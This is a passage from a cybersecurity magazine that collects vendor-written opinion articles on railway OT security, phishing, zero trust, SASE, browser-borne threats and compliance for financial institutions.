systems requires protection from many threats, and disruption can harshly impact a nation’s society,

economy, and culture. As the critical industry of railways continues to grow, the risk of cyber-attacks has

risen sharply.

This creates a need for powerful cybersecurity solutions that can be rapidly and conveniently integrated

into routine railway operations to safeguard these critical networks and systems. In addition, these

solutions should be resource efficient and transmit data fast enough to keep up with commuter traffic and

to accommodate the distributed nature of modern railway technologies.

The vulnerable architecture of railway assets

Cyber attacks on national utilities and transport networks have increased massively recently, but they are

by no means new. Back in 2015, security specialists set up a realistic simulated rail network at the CeBIT

trade fair in Hannover and put it online to see how much attention it would attract from hackers. Over its

6-week runtime, 2,745,267 cyber attacks were documented, and in “about 10 percent of the attacks”



intruders were able to gain control over simulated assets. 1 Would-be attackers’ knowledge of railway

systems has progressed even further in the seven years since this experiment.

On the one hand the distributed network architecture of the railway infrastructure allows incredible

adaptability and for the use of a wide variety of modular assets. On the other hand, many of these assets

are no longer up-to-date or patchable. So, the fast-changing nature of cyber threats clashes with/comes

up against the long service life and diversity of equipment, making the enforcement of security policies

daunting. The same high-connectivity pathways that increase accessibility for trusted railroad engineers

also increase accessibility for malicious intruders, which is why specially designed cybersecurity

appliances and software can be so essential.

Every system needs individual protection

Each rail subsystem is a different set of assets with its own individual cybersecurity requirements. Every

rail subsystem application classified as security-relevant has been systematically type-tested and

secured according to the relevant certifications before leaving the factory. However, the downside of

certifications is that they introduce general patterns into defenses that hackers can learn to anticipate

and exploit. Defenses for critical services need to go beyond the bare minimum necessary to meet

certifications or regulations and include protections that give hackers a hard time. Furthermore, the

ongoing support of dedicated security researchers is necessary to adapt these defenses against new

cyber threats.

User-friendly tailored solutions

Cybersecurity begins with education of the staff, but the busy day-to-day work of railway personnel rarely

leaves space for that. Thus, all defensive solutions must be as failsafe and streamlined as possible to

promote ease of use. Ideally railway subsystems need appliances that have the necessary protocol

sensitivity to check network traffic for suspicious actions and deny unusual or unlikely behavior. Such

appliances have the further benefit of significantly reducing the likelihood of human error.

Each subsystem is dependent on solutions created to meet its specific needs. TXOne Networks suggests

an OT zero trust approach to securing operational environments, which includes three phases:

segmenting networks, scanning inbound and mobile assets with a portable rapid-scan device, and

securing endpoints with defensive solutions tailored to the endpoint’s type (legacy or modernized).

Stop intruders and isolate malware

Traditional intrusion prevention systems (IPSes) were mere filtering systems, which are no longer

adequate protection for critical infrastructure networks. Instead, modernized solutions like TXOne’s Edge

series of next-generation IPSes and firewalls bring more sophisticated protection to assets at the station

and wayside. Edge series defenses, based on the OT zero trust methodology, detect suspicious behavior

1

Vlad Gostomelsky, “Securing the Railroads from Cyberattacks”, Mass Transit Magazine, Dec 17 2019



on legitimate accounts or from legitimate devices, put a virtual patching “shield” around legacy assets

that cannot be patched or replaced, and segment networks so that they’re much more defensible.

The access points (APs) that a train uses for mesh or roaming are often running with limited or hardly

any security, enabling intruders to potentially affect the signal control system. An EdgeIPS solution is

perfect for deployment between the AP and its switch, preventing attackers from accessing or affecting

the network.

Safeguarding mobile and stand-alone assets

One common way dangerous threats get into OT environments is devices brought on-site by vendors or

maintenance experts. That is why, in addition to routine scans of deployed technology, security experts

recommend using dedicated mobile security devices for pre-scans of new devices before they are

deployed on the network. Such a device can be used to set up a checkpoint where all laptops and other

devices brought on-site are scanned. This requires a solution with the ability to conduct quick scans

without the need for software installations so that it can be used for checkpoint scans as well as for

sensitive equipment that cannot accept installations.

How to protect fixed-use and legacy assets

For fixed-use systems such as ticket vending machines and on-board computers, a trust list-based ICS

endpoint protection application is the ideal solution. Even if malware finds its way into a company’s

working hardware, it cannot be executed because of the trust list-based lockdown. For example,

applications, configurations, data, and USB devices are all locked down with a trust list. It excludes all

unlisted applications from running and unlisted users cannot make changes to data or configurations.

Only administrator-approved USB devices can connect to the device, and only an administrator can grant

a device one-time permission to connect.

Conclusion

In today’s world bad actors and criminal organizations prefer to conduct their attacks over the internet

from the comfort of their computer chairs – which makes them even more dangerous. To secure daily

operations and maintain passenger confidence, computation must be protected from disruption while

maintaining maximum availability, with no aspect of the exchange using more time or resources than

necessary. This is why specially designed cybersecurity appliances and software are so essential to the

protection of railway subsystems.

Additional information can be found at www.txone-networks.com and https://www.txonenetworks.com/white-papers/content/securing-autonomous-mobile-robots



About the Authors

Michael Cheng is a director at TXOne Networks with 20 years of experience

in global product management, software development, quality assurance,

and cybersecurity for IT, OT, and ICS environments. He holds an ISA/IEC

62443 Cybersecurity Expert certification.

Michael Cheng can be reached online at michael_cheng@txonenetworks.com

or at contact@txone-networks.com

C. Max Farrell is a senior technical marketing specialist for TXOne

Networks, where he has worked from a background in cybersecurity,

technology, and business since 2019. He conducts research related to

industry-critical technology, economy, and culture.

C. Max Farrell can be reached online at max_farrell@txonenetworks.com

or at contact@txone-networks.com



Biggest Cyber Trend in 2022

You Can’t Fix Stupid

By Guy Rosefelt, CPO, Sangfor Technologies

Stop me if you have heard this one: a customer is working late at night, been a long day, and very tired.

Customer needs to clear a few remaining emails including one from the CEO. Without thinking about it,

customer opens the email from the CEO, barely skims it and opens the attached Word document. Just

as the Word doc opens, customer realizes the email looks a bit odd and then it hits, it is a phishing email.

Laptop infected.

Sound familiar? That just happened to my customer yesterday. And he knows better but was tired and

on autopilot. We spent an hour online trying to figure out how bad the infection was and if he should wipe

out his system and reimage since he had just done a full backup the week before. We decided to err on

the side of caution and wipe and restore.

The moral of the story is anti-phishing will never be 100% successful. The best security products are only

ninety-nine point something successful, but even at that rate with the number of emails received in an

organization daily, a few are going to get through. And someone will click on one. My customer is normally

very diligent, but he slipped. Worse, there are a few employees in every company that do not really check

to see if emails are suspicious and will open them anyway.



Why am I rehashing this old trope? Because Barracuda Networks reported a 521% increase in phishing

emails using COVID-19 Omicron variant to entice victims between October 2021 and January 2022.

People looking for home testing kits were prime targets and easy prey. Webroot reported a 440%

increase in May 2021. And more will keep coming.

“So, Guy,” you may ask, “how can you save us from phishing?” Well, I cannot, and no one else can

either. What we need to do is bite the bullet and shift our strategy from trying to block everything to

assuming we are already compromised, breached, hacked, etc. Once you start from that viewpoint, it

does not matter that you cannot fix stupid, you just have to deal with the aftermath. Your focus is now on

threat hunting, looking for signs of compromise. Do you have tools that can watch low and slow network

behavior that are indications of stealth scanning? Can you identify regular bursty encrypted traffic being

sent someplace out on the internet that might be data being exfiltrated? Can you track system resource

utilization for signs of cryptomining or other malicious behavior?

What makes looking for these kinds of behavior difficult is they are all AI-based. That’s right, attackers

have learned to weaponize artificial intelligence (AI) into advanced persistent threats (APTs) and other

malware payloads. The malicious software installed has become so much smarter than you think. It will

look for specific targets, domains, even countries before it decides to activate. It can hide inside legitimate

processes running in memory, evading security scans. In fact, it can disable security software running on

systems without you knowing about it.

There is a powerful batch script available now called Defeat-Defender that can shut down all Windows

Defender processes silently. The best part is Defeat-Defender can masquerade as a legitimate process,

evading the new Windows Tamper Protection functionality. All from opening an infected Word document.



I see heads shaking in despair and a few of you getting ready to jump out of your office windows (you

realize some of you work in the basement…). But there is a strategy that can help you through this dark

and difficult time. You need to do 4 extremely simple and painless things:



1. Look for and minimize attack surfaces

Conduct external and internal attack surface assessments to find ways for the attack malware to breach.

Look for signs that those surfaces were exploited. Then work to close those holes.

2. Deploy AI-based detection and response

You need to use AI to combat AI, but not just any AI. Security tools that employ broad-based AI will not

find the signs of stealthy activity or APTs. Purpose-built AI models designed to identify very specific

behaviors are needed, such as looking for enormous amounts of abnormal DNS requests going to

malicious domains or finding short periods of bursty HTTPs traffic during off hours; both are indications

of data exfiltration.

3. Improve security system synergy

All security products have a sphere of influence covering their own security domain. But the domains do

not overlap causing gaps that AI-enabled APTs can exploit. Having security products share data realtime

and coordinate responses can close those gaps.

4. Augment security operations and resources by using security services

Face it, you do not have enough time, staff, or resources to go into threat hunting mode. And if you are

breached and under attack, can you really do incident response (IR)? Even the security teams in the

largest organizations are resource limited. Leverage your VAR or security vendor to provide resources

to backfill your team, help conduct assessments and IR, and do managed detection and response. Think

of it as a home security monitoring service available 24 hours a day; that is there when the breach occurs

during off-hours.



It isn’t possible to block everything 100% and combating stupid makes it even harder. Since you can’t fix

stupid, these 4 things can minimize and contain the damage caused. More importantly, thinking like an

attacker will help you find signs if you were attacked and close off any holes and vulnerabilities that

attackers will use.

About the Author

Guy Rosefelt, Chief Product Officer, Sangfor Technologies. Guy is

Chief Product Officer for Sangfor Technologies. He has over 20 years’

experience (though some say it is one year’s experience twenty times)

in application and network security, kicking it off with 10 years in the

U.S. Air Force, reaching rank of captain. After his time in the USAF

building the first fiber to the desktop LAN and other things you would

find in Tom Clancy novels, Guy worked at NGAF, SIEM, WAF and

CASB startups as well as big-name brands like Imperva and Citrix. He

has spoken at numerous conferences around the world and in people's

living rooms, written articles about the coming Internet Apocalypse, and

even managed to occasionally lead teams that designed and built

security stuff. Guy is thrilled to be in his current position at Sangfor -- partly because he was promised

there would always be Coke Zero in the breakroom. His favorite cake is German Chocolate.

Guy can be reached online at guy.rosefelt@sangfor.com or on Twitter at @otto38dd and at our company

website https://www.sangfor.com/en .



On The Frontline in The War Against Hackers

By Damien Fortune, Chief Operations Officer of Secured Communications

In the wake of a global shift toward remote work, crime is moving from physical space to cyberspace.

Businesses are conducting more important and valuable business online than ever before, and

accordingly, more valuable and sensitive information is being transmitted across insecure networks. This

has presented bad actors with the incentive and opportunity to increase their focus on cybercrime and

given the ever-increasing sophistication of cyber threats and access to robust computing power,

cybersecurity companies have been tasked with evolving to better combat these emerging threats.

Over the last decade, data breaches have surged, exposing sensitive information, and undermining

customer confidence which is potentially devastating, especially for smaller businesses. Companies, now

more than ever, need to know how to keep their data secure while maintaining a seamless and productive

work environment. On the back of these trends, new protocols are emerging to provide additional layers

of defense to corporate communications.



One of the newest tools in the fight against cybercrime is Messaging Layer Security (MLS). This next

generation end-to-end encryption (E2EE) security layer encrypts each individual message with a

changing encryption key, allowing for Perfect Forward Secrecy (PFS) and Post-Compromise Security,

meaning that if a message were ever intercepted and compromised, that message’s content would be

the only thing exposed, as opposed to jeopardizing entire message chains or providing information that

would enable further surveillance through man-in-the-middle attacks. Most communications platforms on

the market today use older technology of transport layer security (TLS) technology, which does not

provide similar layers of protection, and which is vulnerable to attacks from a variety of vectors.

Alongside digital protection of content itself, tools to protect users are also advancing. Multi-

Factor Authentication (MFA), which requires users to present multiple forms of proof of identity

to access information, has become more prevalent. Traditionally, MFA asks for either something the

user knows (such as a password); something they have (such as their device); and as the most secure

option – who they are (biometrics using Touch ID or Face ID).

Increasing technical sophistication and access to more computing power by those that choose to hack

into business systems has made the migration to more-sophisticated tools inevitable. With modern

workflows continuing to shift from outdated email systems in favor of messaging and collaboration-centric

tools, we would expect MLS, MFA, and other tools to come to the forefront of cybersecurity suites in the

near term.

About the Author

Damien Fortune is the Chief Operations Officer of Secured

Communications, the leading global technology company specializing in

ultra-secure, enterprise communications solutions that are trusted by

businesses, public safety and counter terrorism professionals worldwide.

His career began on Wall Street where he worked as a sell-side analyst

covering energy and industrial equities. From there he transitioned into

private equity as a portfolio manager and eventually into a role as

CFO/COO of a portfolio company.

Damien can be reached online at support@securedcommunications.com

and at our company website http://www.securedcommunications.com.



How to Fix Mid-Market Security Using Intelligent

Automation and AI

By Guy Moskowitz, CEO, Coro

Market forces are working against medium-sized businesses, leaving companies that don’t have large,

dedicated security teams and fat cyber security budgets exposed to cyber threats. When combined with

the global pandemic and the fact that cyber criminals have expanded into mid-market targets, mediumsized

companies face greater risk than ever, and it’s time IT leaders and the industry step up to take care

of this gap.

Three factors have arisen that have had dire consequences for medium-sized businesses:

1. The cyber security industry has neglected the mid-market in its pursuit of enterprise-grade

security solutions with proportional enterprise price tags.

2. The global pandemic accelerated the trend toward remote work and adoption of cloud platforms,

leaving many companies with much larger attack surfaces, and an out-of-date cybersecurity

architecture.

3. Due to commoditization of cyber attacks, cyber criminals turned their eyes toward the mid-market,

which has proven to be less sophisticated and less funded in terms of cyber security.



The Cyber Security Market Has Failed Medium-Sized Businesses

The cyber security market has bifurcated into large, enterprise solutions and niche point solutions. Midmarket

companies are stuck in an inhospitable middle, where they don’t have the budget and resources

to purchase large enterprise solutions, but also have too much complexity and attack surface for point

solutions to be effective in providing security.

The high cost of implementing and operating security solutions severely impedes their adoption by midmarket

companies. Companies with 1,500 and fewer employees often have limited cyber security

budgets and very few dedicated security professionals – if they have any specialists at all. Hundreds of

employees and thousands of endpoints create an attack surface that stretches IT teams to their limits.

Mid-market companies are therefore forced to make bets on the most probable attack vectors to defend

against, leaving the rest of the attack surface exposed.

The Pandemic-Driven Shift Toward Remote Work Caught IT Departments Flat Footed

Nobody was ready for large-scale remote work in 2020. Teams were not culturally prepared to conduct

business online, office software wasn’t designed for remote work as its primary use case, and IT

departments had mostly focused on on-site and VPN-style security. The shift to predominantly remote

work in 2020 and 2021 disrupted every aspect of business and created huge opportunities for attackers

seeking to exploit the relative naivete of the new cloud working environment.

In Coro’s recent report analyzing mid-market cyber security, we found that while 50% of medium-sized

companies had email malware protection in place in 2021, 88% of them had misconfigured their

protection settings. Meanwhile, only 16% of mid-sized companies had email phishing protection in place,

and 71% of them had misconfigured settings. Other attack vectors fared similarly or worse. This means

many of the technologies deployed by IT teams, and especially the new ones deployed since the

beginning of the pandemic to enable remote work, offer little actual protection against emerging classes

of cyber threats.

Cyber Criminals Are Turning Downstream for Easier Pickings

A big score against a large enterprise is exciting for a cyber criminal, but so is the prospect of several

smaller, easier scores. We observed this in practice in 2021 as attacks on medium-sized companies

increased both in volume and in sophistication.

Specifically, we saw that attacks on mid-market companies increased by 150% in the past two years.

Moreover, these attacks are not just generic (AKA naive) attacks, but are increasingly tailored attacks for



the particular victims being targeted by the hackers. Customized attacks against mid-market companies

have expanded 4x in 2021. Insider threats, whether accidental or malicious, have also doubled in 2021,

showing the greater role employees have played in cyber vulnerabilities during the pandemic.

Closing the Mid-Market Cyber Security Gap with Intelligent Automation and AI

Mid-market spending on cyber security was up in 2021 as companies began to feel the heat from cyber

criminals testing their defenses. But most of the industry’s comprehensive cyber security solutions are

aimed at large enterprise customers – and mid-market companies need options beyond stitching together

piecemeal point solutions.

The three challenges to mid-market cyber security remain: overly expensive and complicated solutions,

greatly expanded attack surface driven by remote work, and increased attacks by hackers seeking to

exploit the mid-market. To overcome these challenges, companies need affordable solutions that

augment existing IT with built-in intelligence and non-disruptive security workflows. This is where

automation and AI come in.

As I said earlier, 88% of email malware solutions are misconfigured – and that doesn’t even account for

cloud malware, Wi-Fi phishing, and a huge range of emerging attack vectors for which most mid-sized

companies have no protections in place. Why should such misconfigurations and omissions leave a

company exposed to cyber threats, especially when a single breach could paralyze a business or cause

enough damage to close its doors forever? Where possible, the responsibility for effective cyber defense

needs to be shifted off the shoulders of overstretched IT teams and onto machines. AI must be deployed

to enable small teams with limited resources to effectively manage large and complex situations. Small

companies must seek solutions that simplify the security experience: comprehensive, all-in-one solutions

that are easy to deploy and easy to operate by way of intuitive UX design and AI automation.

The truth is, most small and mid-sized companies don’t need dozens of security professionals to manage

straightforward and common security tasks. Look for security solutions that instead make use of

intelligent automation to reduce the load on IT and security teams. Intelligent automation can

automatically block malware threats, prevent accidental or malicious data leakage, lock down rogue

accounts, and prevent the majority of incoming attack attempts, all without human intervention. For the

small percentage of issues that AI and intelligent automation can’t resolve, a concise and clear notification

can be sent to administrators that can be resolved quickly and easily.

Even in this rapidly evolving cyber climate, the cost and complexity of security can be managed, and

escalating cyber threats can be controlled. Comprehensive cyber security can and should be fully

accessible to mid-sized companies. It’s time for mid-market IT leaders reconsider the standard point



solutions and seek comprehensive, AI-enabled software with built-in intelligence, designed specifically

for their needs: elegant, non-disruptive security within a single, efficient platform.

About the Author

Guy Moskowitz is the CEO of Coro, one of the fastest growing

security solutions for the mid-market, providing all-in-one protection

that empowers organizations to defend against malware,

ransomware, phishing, and bots across devices, users, and cloud

applications. Guy can be reached online at (LinkedIn and Twitter) and

at our company website https://www.coro.net/



5 Ways Cybersecurity Will Change In 2022

By Jaime Coreano, Vice President of Sales – Flexxon

The annual cost of cybercrime is set to hit $10.5 trillion by 2025. The losses caused by theft, fraud and

embezzlement are compounded by the disruption that follows. Forensic investigations, restoration and

deletion of hacked data and systems, lost productivity and, inevitably, reputational harm all add to the

bill.

Of course, cybercrime is a shape-shifting enemy that quickly adapts to its surroundings. As more of our

national, corporate and personal business goes digital, new threats emerge and priorities shift.

Fore-warned is fore-armed, however! So, to ensure we have the right cybersecurity technologies in place

and carry out meaningful techstack reviews, here are the top five cybersecurity trends that X-PHY has

identified for 2022.



#1: Firmware level attacks will increase

The much-cited Security Signals Report published by Microsoft in March 2021 noted that at least 80

percent of enterprises in major economies had suffered at least one attempted firmware attack in the

previous two years.

Firmware attacks are daunting precisely because firmware sits ‘below’ the operating system, where the

most common and familiar tools for detecting and quarantining malware cannot see them. But until now,

firmware threats have not been treated seriously enough by enterprise security teams. As the Security

Signals Report tells us, only 29 percent of security budgets were allocated to protect firmware.

That has to change.

There are many ways that firmware attacks can be launched against network devices and cause untold

amounts of damage. Equally, there are plenty of basic housekeeping and security steps that can

eliminate a number of potential vulnerabilities. AI-enabled security at the firmware level for example,

allows real-time data protection against all sorts of software-based malware, ransomware, and viruses

without human intervention.

#2: More firms will be subject to an inside job

The measures security professionals take to narrow the attack surface are based on the simple idea that

the threat is ‘out there.’ But this focus on preventing and detecting external attacks can create a significant

blind spot: the threat from inside.

Whether from malicious intent or clumsy accident, trusted employees and partners can cause more

damage than ever before. New ways of working and greater digital engagement change the nature of the

company network and its assets. According to Ponemon Institute’s 2022 Cost of Insider Threats: Global

Report the incident rate is up by 44 percent in the past two years, with costs per incident now at $15.38

million. There is little sign that this is slowing down.

In this environment, the zero-trust model – which leaves no room for protocol, courtesy or respect for

seniority – treats every insider with suspicion. That means proper, multi-factor authentication for every

access to every system or service, plus monitoring, logging and effective pattern detection to detect any

anomalous insider behavior. It may be an uncomfortable idea for many, but it is a necessary one.



#3: Supply chains will be the big ransomware target

In July 2021, a medical management services provider in New York experienced a ransomware attack

that affected more than 1.2 million individuals – one of the largest breaches of health data reported to the

federal regulators in 2021.

We are all familiar with the threat of ransomware. What is changing is the number of cyberattacks – like

this one – that target trusted third-party vendors who offer services or software that are vital to the supply

chain, but which attack agents regard as softer targets.

IT decision-makers believe that these kinds of supply chain attacks are to become one of the biggest

threats to their organizations in the coming year. But most have not vetted either their current or

prospective suppliers in the past 12 months.

To stay ahead of it, now is the time for organisations to put a response strategy into place. Until they do,

this will remain an attractive target.

#4: Increased risk for SMBs

The world has changed but the age-old mantra still applies: attack agents will always go for the easiest

target. That is what is driving the growth in supply chain attacks – and is also behind the increasing

frequency of attacks on SMBs.

In its 2020 Internet Crime Report, the FBI recorded 791,790 complaints of suspected internet crime

among small businesses (300,000 more than in 2019), and total losses of more than $4.2 billion.

SMBs may not have the resources or expertise to protect themselves adequately, but they still have

valuable information residing within their systems. That’s why they are subject to growing numbers of

targeted and complex attacks.

In addition, the recent mass shift toward remote and hybrid working practices has seen people’s private

and professional lives becoming intertwined, often resulting in a less than diligent approach to

cybersecurity. With that, SMBs have experienced a jump in cyberattacks as a result of human error. In

fact, human error is responsible for a staggering 95 percent of data breaches, an issue that has only

been heightened by the effects of the pandemic.

As such, it has become clear that just like everyone else, SMBs need robust cybersecurity that includes

all layers, from software to the physical and everything in between.

Enter, AI-infused cybersecurity solutions. AI has the power to reduce human intervention, allowing data

to be secured without the need for extensive knowledge or training.



#5: Vulnerabilities in critical Infrastructure will be recognized

At the other end of the scale is critical national infrastructure, which is increasingly digitalized but reliant

on security measures for control systems that were developed before data, sensors, and networking were

embedded in core control systems.

Critical infrastructure is no more immune to the natural laws of cybersecurity than any other sector of the

economy: surges in technological development create the perfect environment for cyber crime to flourish,

and the targets with the highest value but weakest security will be top of the list.

An attack on just the building management system of just one New York City office block via a connected

vending machine caused damage estimated at $350m. The economic impact of a severe cyber-attack

on the US power-grid could be at least $240bn.

But the motive to hit critical infrastructure isn’t just financial. It can be political too. Hacktivists, terrorists

and foreign agents see energy grids, health systems, and transport logistics, as useful bargaining tools.

Intelligent, bullet-proof solutions are needed, ideally a zero-trust architecture with AI-embedded cybersecure

SSD as the last line of defense.

This is X-PHY’s final, unofficial, prediction for 2022. Offense is getting smarter. So will the defense. This

is the year that zero-trust architecture becomes the lens through which all cybersecurity solutions are

viewed.

About the Author

Jaime Coreano is Vice President of Sales at Flexxon. As a Sales

and Business Development executive with 25 years of experience

in semiconductors, electronic components and cybersecurity, his

vision and strategy have greatly impacted the success of his clients

in the Americas. Most recently, he has been involved in emerging

Cyber Security solutions based on hardware level AI based

protection against ransomware, data cloning and physical attacks.

our company website https://www.flexxon.com/



Executive Order Instructs Certain Organizations to

Improve Their Cybersecurity Stance

Financial Institutions Should Boost Their Efforts to Thwart Cyberattacks

By Bob Thibodeaux, Chief Information Security Officer, DefenseStorm

Consumer data is one of the most valuable assets for organizations around the world. In fact, it’s been

said that consumer data is as good as gold.

And like gold, data is a commodity. However, companies profiting by accessing and storing this data

have the responsibility to keep it safe. Protecting data has even become a consumer expectation thanks

to breaches such as Equifax in 2017 (which recently finalized a settlement of up to $425 million) and

LinkedIn and Facebook just last year.

Today, however, companies don’t just put consumer interest on the line when building their cybersecurity.

They can now face new, severe legal action.



Implementing legislation in hopes to minimize damage

The Biden administration recently issued Binding Operational Directive 22-01, requiring most federal

agencies to patch hundreds of cybersecurity vulnerabilities considered major risks for damaging

intrusions including data breaches or compromise of government computer systems.

Specifically, “Organizations of all sizes, including the federal government, must protect against malicious

cyber actors who seek to infiltrate our systems, compromise our data, and endanger American lives,”

DHS Secretary Alejandro Mayorkas said in a statement alongside the directive. The new order “requires

federal civilian departments and agencies to protect against critical known vulnerabilities, which will

reduce the risk of malicious intrusion and increase our collective cybersecurity.”

What this boils down to is federal institutions, banks, credit unions and fintechs nationwide must find ways

to comply with these new cybersecurity standards and mandates. But how? What if you are already

behind the 8 ball? What can be done not only to improve but catch up?

Meeting challenge with opportunity

While the new government mandate might seem an insurmountable challenge to all but the big

corporations, it isn’t. Rather, it’s an opportunity to shore up security and thwart cyberattacks and data

breaches.

Financial institutions everywhere already abide by considerable cybersecurity, privacy and information

security requirements. Further, many have adopted the National Institute of Standards and Technology’s

(NIST) Cybersecurity Framework as their main cyber risk management tool. But financial institutions that

haven’t met those standards could take the order as an impetus to do so and improve their cybersecurity

posture and make improvements in the maturity of their risk management program.

Perhaps, too, federal institutions will view the order as a reason to enact zero-trust policies, procedures,

and relevant technologies. The order mandates executive branch agencies to create zero-trust

environments.

Putting cybersecurity best practices in place

Whether a bank, credit union or fintech adopts a zero-trust model or not, it’s wise to consider these best

practices to increase cybersecurity:

• Proactively monitor total cyber exposure. Consider partnering with a built-for-banking

company that provides 24/7, real-time cybersecurity and cyber compliance and sends alerts of

any anomalies.



• Stay ahead of fraud. Fraud costs U.S. financial institutions $35 billion a year. Choose a

cybersecurity provider that can integrate Information Security and the Bank Secrecy Act (BSA) –

also known as the Anti-Money Laundering (AML) law and Fraud departments in a unified platform

to prevent losses and protect account holders from the growing threat of fraud.

• Extend internal cyber teams and expertise with highly skilled and trained security experts.

Not every financial institution has the resources to adequately monitor and protect their networks,

particularly outside of “banking hours.” As such, many partner with a certified cybersecurity

provider that monitors and investigates alerts and provides around-the-clock protection that aligns

with a company’s specific escalation process. By being that “extra set of eyes,” financial

institutions can focus on their core business.

• Keep up to date with compliance. Choosing a cybersecurity provider that also provides cyber

compliance makes it simple and seamless for financial institutions to stay up to date, even though

regulatory requirements seem to be always changing. The right provider allows financial

institutions to leverage an always-on policy and control engine to make sure when compliance

requirements change, organizations can comply.

• Provide ongoing cybersecurity education. An organization is only as secure as its weakest

link. Therefore, employee education should be a top priority. Employees should understand how

to do things like choose passwords wisely and know how to detect phishing attacks – and what

to do when a questionable email comes their way.

Leveraging a trusted cybersecurity partner

The current administration has prioritized cybersecurity as a national security threat. The mandate aside,

cybersecurity should be a priority for everyone and every business.

Financial organizations failing to address cybersecurity could face major damage that includes monetary

loss, legal consequences, and reputational damage – leading to a loss of customers.

Keep in mind, financial institutions face more than 70 million cyber events a day. And most small- to midsized

financial institutions simply don’t have the staff to manage the volume of incidents that can be

generated by these events, particularly those occurring after hours.

An experienced cybersecurity provider can help ensure financial institutions are threat-ready and secure.

The right one can consolidate data from all sources and without volume limits – providing real-time

visibility into the entire network. It can eliminate false positives and prioritize events so you can address

the threats that matter the most.

Because here’s the thing: There are two types of organizations – those that have suffered a data breach

and those that will.

And like the price of gold that keeps rising, so, too will the cost of falling prey to a cyber breach.



About the Author

Bob Thibodeaux, Chief Information Security Officer at

DefenseStorm, has more than 20 years of experience as a senior

security expert and highly accomplished IT executive and

engineer. Through leadership positions managing IT departments

and programs, technology operations and data center operations,

Bob has driven innovative process improvements, disaster

recovery programs, information security strategies, and audit and

compliance improvements. He has been responsible for incident

response, risk management and penetration testing for

community-focused banks, credit unions and high-tech companies

across the United States. Bob is a Certified Information Systems

Security Professional, Digital Forensics Examiner and GIAC

Penetration Tester. Bob holds a degree in Business and

Management from the University of Maryland and is a retired

USAF Senior Master Sergeant. Bob can be reached online at our

company website https://www.defensestorm.com/.



Too Hot to Handle:The case for Zero Trust and SASE

By Jonathan Lee, Senior Product Manager, Menlo Security

In security today we often see the continued reliance on legacy systems and solutions.

As cybercriminals have evolved their methods, the security adopted by firms has been unable to keep

up with a mindset that is focused on detection and response – and criminals know this.

The recent shift of data, users and applications to the cloud has made the browser the primary place of

work. Yet when it comes to the cloud, those same on-prem security measures that are still heavily relied

upon today are no longer adequate.

To capitalise on this new landscape, threat actors are targeting web browsers with a category of threats,

termed Highly Evasive Adaptive Threats (HEAT) that bypass traditional security defences.

HEAT attacks make web browsers the primary attack vector, deploying various methods to evade

multiple layers of detection in legacy security stacks. This allows them to bypass traditional web security

protection and leverage the standard capabilities of modern web browsers to deliver malware or

compromise credentials.

In its analysis of almost 500,000 malicious domains, Menlo Security Labs discovered that 69% of these

websites used HEAT tactics to deliver malware. These attacks allow bad actors to deliver malicious



content to the endpoint by adapting to the targeted environment. Since July of last year, our research

team has seen a 224% increase in HEAT attacks.

Given that many of us now spend around three-quarters of our day using a web browser, it’s an obvious

target.

HEAT attacks leverage one or more of the following core techniques that bypass legacy network security

defences:

1. Evades both static and dynamic content inspection: HEAT attacks evade both signature and

behavioural analysis engines to deliver malicious payloads to the victim using innovative techniques,

such as HTML Smuggling. This technique was used by Nobelium the hacking group behind the

SolarWinds ransomware attack. In a recent case, dubbed ISOMorph, the campaign used the popular

Discord messaging app to host malicious payloads. Menlo Labs identified over 27,000 malware attacks,

which were delivered using HTML Smuggling within the last 90 days.

2. Evades malicious link analysis: These threats evade malicious link analysis engines traditionally

implemented in the email path where links can be analysed before arriving at the user.

3. Evades offline categorisation and threat detection: HEAT attacks evade web categorisation by

delivering malware from benign websites, either by compromising them, or patiently creating new ones.

Referred to as Good2Bad websites. Menlo Labs has been tracking an active threat campaign dubbed

SolarMarker, which employs SEO poisoning. The campaign started by compromising a large set of low

popularity websites that had been categorised as benign, infecting these websites with malicious content.

Good2Bad websites have increased 137% year-over-year from 2020 to 2021.

4. Evades HTTP Traffic Inspection: In a HEAT attack, malicious content such as browser exploits,

crypto-mining code, phishing kit code and images impersonating known brands’ logos is generated by

JavaScript in the browser by its rendering engine, making any detection technique useless. The top three

brands impersonated in phishing attacks are Microsoft, PayPal, and Amazon. A new phishing website

imitating one of these brands is created every 1.7 minutes.

The case for Zero Trust and SASE

Be it file inspections performed by SWG anti-virus engines and sandboxes, network and HTTP-level

inspections, malicious link analysis, offline domain analysis, or indicator of compromise (IOC) feeds,

many legacy defences are rendered near useless when confronted with these evasive techniques.

A significant part of the challenge lies in the fact that HEAT characteristics equally have genuine uses.

Therefore, they cannot simply be blocked at the function level. Rather, they need to be prevented.

To achieve this, a shift in mindset and an updated security posture is required. Trying to overcome the

challenges of web security with endpoint security creates a square peg in a round hole scenario – it

simply does not guarantee protection.



Critically, endpoint security only detects a threat once it is written to the file system, at which point a

network will likely have been compromised already. Further, it is not able to protect unmanaged devices,

while also harbouring a high chance of inundating the security operations centre (SOC) with too many

alerts.

In dealing with HEAT, prevention is the best policy. Not only can it help to alleviate pressures on

endpoints, but it can also make the already challenging lives of SOC teams much easier, creating a more

sustainable environment of investigation, escalation and resolution.

This shift begins with a thorough review of existing security policies. Those that still remain built around

a central policy pillar of detection and response need to be adapted and enhanced so they are fit for

purpose in the modern work environment.

A Zero Trust approach, backed by the Secure Access Service Edge (SASE) framework, which

feature key security technology components will cater to today’s remote and hybrid workforces. SASE

ensures security is built around users, core applications and company data at the edge by converging

connectivity and security stacks. No longer are security stacks on the outside looking in; they are

integrated within the cloud.

In the face of HEAT, organisations should focus on three key tenets to limit their susceptibility to these

types of attacks: shifting from a detection to a prevention mindset, stopping threats before they hit the

endpoint, and incorporating advanced anti-phishing and isolation capabilities.

For more information on HEAT: Too Hot to Handle.

About the Author

Jonathan Lee, Senior Product Manager, Menlo Security.

Jonathan Lee serves as a trusted advisor to enterprise customers,

and works closely with analysts and industry experts to identify

market needs and requirements, and establish Menlo Security as

a thought leader in the Secure Web Gateway (SWG) and Secure

Access Service Edge (SASE) space. Jonathan previously worked

for ProofPoint and Websense. As an industry expert, commentator

and speaker, Jonathan is well versed in data protection, threat

analysis, networking, Internet isolation technologies, and clouddelivered

security.

Jonathan can be reached online at @Menlosecurity and at our

company website: https://www.menlosecurity.com/



Lessons Learned: In the Principle Of “Least Privilege,”

Where Do Companies Fall Short?

By Raj Dodhiawala, President, Remediant

Lateral movement using compromised admin credentials is integral to almost all ransomware

and malware attacks today. Specifically exploiting privilege sprawl—or the always-on, alwaysavailable

administrative access to servers, workstations, and laptops—has become a lucrative

opportunity for cyber attackers, allowing them to significantly increase their rate of success with

